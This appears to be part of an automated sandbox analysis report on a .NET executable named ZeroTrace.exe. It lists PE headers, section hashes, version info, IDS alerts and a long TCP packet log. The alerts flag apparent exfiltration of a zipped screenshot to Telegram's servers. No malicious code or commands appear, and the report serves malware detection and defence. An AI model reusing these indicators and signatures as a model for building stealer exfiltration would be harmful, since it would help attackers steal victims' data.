add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x369d4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x5ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x369b8	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x34a34	0x34c00	8efd2ee6ad7a7134a2654a624ca7e968	False	0.43711122630331756	data	5.951560398938468	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x38000	0x5ac	0x600	aa4d32f077ce322aee3ae18708136e2d	False	0.416015625	data	4.0750387696154515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3a000	0xc	0x200	972996bafa2780d18a92755216bedcbb	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x38090	0x31c	data			0.4258793969849246
RT_MANIFEST	0x383bc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	ZeroTrace
FileVersion	1.0.0.0
InternalName	ZeroTrace.exe
LegalCopyright	Copyright 2024
LegalTrademarks
OriginalFilename	ZeroTrace.exe
ProductName	ZeroTrace
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-14T14:22:29.438054+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49699	149.154.167.220	443	TCP
2025-03-14T14:22:29.445161+0100	2843856	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2	1	192.168.2.7	49699	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2025 14:22:12.514040947 CET	49681	443	192.168.2.7	34.117.59.81
Mar 14, 2025 14:22:12.514085054 CET	443	49681	34.117.59.81	192.168.2.7
Mar 14, 2025 14:22:12.514172077 CET	49681	443	192.168.2.7	34.117.59.81
Mar 14, 2025 14:22:12.525122881 CET	49681	443	192.168.2.7	34.117.59.81
Mar 14, 2025 14:22:12.525141001 CET	443	49681	34.117.59.81	192.168.2.7
Mar 14, 2025 14:22:13.055591106 CET	443	49681	34.117.59.81	192.168.2.7
Mar 14, 2025 14:22:13.055659056 CET	49681	443	192.168.2.7	34.117.59.81
Mar 14, 2025 14:22:13.063901901 CET	49681	443	192.168.2.7	34.117.59.81
Mar 14, 2025 14:22:13.063927889 CET	443	49681	34.117.59.81	192.168.2.7
Mar 14, 2025 14:22:13.064203978 CET	443	49681	34.117.59.81	192.168.2.7
Mar 14, 2025 14:22:13.114675045 CET	49681	443	192.168.2.7	34.117.59.81
Mar 14, 2025 14:22:13.213768005 CET	49681	443	192.168.2.7	34.117.59.81
Mar 14, 2025 14:22:13.256331921 CET	443	49681	34.117.59.81	192.168.2.7
Mar 14, 2025 14:22:13.352216005 CET	443	49681	34.117.59.81	192.168.2.7
Mar 14, 2025 14:22:13.352406979 CET	443	49681	34.117.59.81	192.168.2.7
Mar 14, 2025 14:22:13.352487087 CET	49681	443	192.168.2.7	34.117.59.81
Mar 14, 2025 14:22:13.380364895 CET	49681	443	192.168.2.7	34.117.59.81
Mar 14, 2025 14:22:21.377111912 CET	49682	443	192.168.2.7	104.26.1.100
Mar 14, 2025 14:22:21.377175093 CET	443	49682	104.26.1.100	192.168.2.7
Mar 14, 2025 14:22:21.377237082 CET	49682	443	192.168.2.7	104.26.1.100
Mar 14, 2025 14:22:21.377563000 CET	49682	443	192.168.2.7	104.26.1.100
Mar 14, 2025 14:22:21.377578020 CET	443	49682	104.26.1.100	192.168.2.7
Mar 14, 2025 14:22:21.869941950 CET	443	49682	104.26.1.100	192.168.2.7
Mar 14, 2025 14:22:21.870019913 CET	49682	443	192.168.2.7	104.26.1.100
Mar 14, 2025 14:22:21.873549938 CET	49682	443	192.168.2.7	104.26.1.100
Mar 14, 2025 14:22:21.873569012 CET	443	49682	104.26.1.100	192.168.2.7
Mar 14, 2025 14:22:21.873850107 CET	443	49682	104.26.1.100	192.168.2.7
Mar 14, 2025 14:22:21.875468016 CET	49682	443	192.168.2.7	104.26.1.100
Mar 14, 2025 14:22:21.920316935 CET	443	49682	104.26.1.100	192.168.2.7
Mar 14, 2025 14:22:22.009787083 CET	443	49682	104.26.1.100	192.168.2.7
Mar 14, 2025 14:22:22.009896040 CET	443	49682	104.26.1.100	192.168.2.7
Mar 14, 2025 14:22:22.009953022 CET	49682	443	192.168.2.7	104.26.1.100
Mar 14, 2025 14:22:22.010535002 CET	49682	443	192.168.2.7	104.26.1.100
Mar 14, 2025 14:22:24.698151112 CET	49688	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:24.698195934 CET	443	49688	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:24.698286057 CET	49688	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:24.698945999 CET	49688	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:24.698964119 CET	443	49688	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.078380108 CET	49688	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.079613924 CET	49693	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.079654932 CET	443	49693	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.079698086 CET	49693	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.084311962 CET	49693	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.084327936 CET	443	49693	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.120330095 CET	443	49688	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.570586920 CET	443	49688	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.570664883 CET	49688	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.603996038 CET	49695	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.604028940 CET	443	49695	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.604101896 CET	49695	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.604659081 CET	49695	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.604677916 CET	443	49695	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.678555012 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.678584099 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.678657055 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.679310083 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.679326057 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.840279102 CET	49697	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.840320110 CET	443	49697	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.840452909 CET	49697	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.844409943 CET	49697	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.844448090 CET	443	49697	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.957221031 CET	443	49693	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.962778091 CET	49693	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:25.962810993 CET	443	49693	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.963836908 CET	443	49693	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:25.963932037 CET	49693	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.013993979 CET	49693	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.014101982 CET	443	49693	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.014787912 CET	49693	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.014805079 CET	443	49693	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.152376890 CET	49693	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.264662981 CET	443	49693	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.268692970 CET	443	49693	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.268745899 CET	49693	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.271049976 CET	49693	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.271068096 CET	443	49693	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.616827965 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.616827965 CET	443	49695	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.618824005 CET	49695	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.618839979 CET	443	49695	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.619012117 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.619023085 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.619901896 CET	443	49695	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.619972944 CET	49695	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.620079041 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.620129108 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.622930050 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.623020887 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.623248100 CET	49695	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.623321056 CET	443	49695	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.623460054 CET	49697	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.624526024 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.624548912 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.624587059 CET	49695	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.624593973 CET	443	49695	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.668334007 CET	443	49697	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.676975012 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.677180052 CET	49695	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.748562098 CET	443	49697	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.748656034 CET	49697	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.927721977 CET	443	49695	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.927864075 CET	443	49695	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.927927971 CET	49695	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.930157900 CET	49695	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.930183887 CET	443	49695	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.954843044 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.954895973 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.954967976 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.954982996 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.954998970 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.955039978 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.955039978 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.955054045 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.955107927 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.955116034 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.955125093 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.955184937 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.955194950 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.964540958 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:26.964754105 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:26.964764118 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.005445957 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.041157961 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.046485901 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.046514034 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.046521902 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.046540022 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.046674013 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.065538883 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.065597057 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.065619946 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.065659046 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.065671921 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.065706968 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.066509962 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.073577881 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.073611975 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.073622942 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.081235886 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.081264019 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.081289053 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.081300020 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.081332922 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.088124990 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.096513033 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.096537113 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.096584082 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.096596956 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.096652031 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.107383013 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.139204979 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.139246941 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.139260054 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.139327049 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.139688969 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.139729023 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.139739037 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.139775991 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.140072107 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.140274048 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.140311003 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.140320063 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.145570040 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.145598888 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.145606995 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.145616055 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.146127939 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.153227091 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.160237074 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.160264969 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.160291910 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.160309076 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.160343885 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.167587996 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.175090075 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.175120115 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.175163031 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.175173044 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.175209999 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.181739092 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.188093901 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.188122988 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.188133001 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.188143015 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.188337088 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.194173098 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.199642897 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.199703932 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.199713945 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.199723005 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.199906111 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.205053091 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.210232973 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.210258961 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.210308075 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.210335016 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.210377932 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.215281010 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.220616102 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.220649004 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.220676899 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.220696926 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.220730066 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.225697994 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.230614901 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.230671883 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.230681896 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.236002922 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.236118078 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.236170053 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.236188889 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.236299992 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.238948107 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.242089987 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.242120028 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.242125988 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.242136002 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.242245913 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.245047092 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.245096922 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.245191097 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.245199919 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.247513056 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.247634888 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.247649908 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.250247955 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.250296116 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.250303984 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.253240108 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.253287077 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.253302097 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.256162882 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.256208897 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.256222963 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.259159088 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.259203911 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.259215117 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.261581898 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.261627913 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.261636019 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.268359900 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.268404007 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.268413067 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.270277977 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.270333052 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.270342112 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.275041103 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.275084019 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.275096893 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.281601906 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.281661987 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.281670094 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.283750057 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:27.283895969 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.294845104 CET	49696	443	192.168.2.7	142.250.185.196
Mar 14, 2025 14:22:27.294862032 CET	443	49696	142.250.185.196	192.168.2.7
Mar 14, 2025 14:22:28.279117107 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:28.279172897 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:28.279360056 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:28.280363083 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:28.280380011 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.128092051 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.128179073 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.132350922 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.132375002 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.132611990 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.136267900 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.176330090 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.438041925 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.441720963 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.441736937 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.443114996 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.443123102 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.443198919 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.443203926 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.443295002 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.443299055 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.443445921 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.443460941 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.443692923 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.443700075 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.444319963 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.444325924 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.444458008 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.444463015 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.444510937 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.444521904 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.444626093 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.444636106 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.444679976 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.444685936 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.444731951 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.444740057 CET	443	49699	149.154.167.220	192.168.2.7
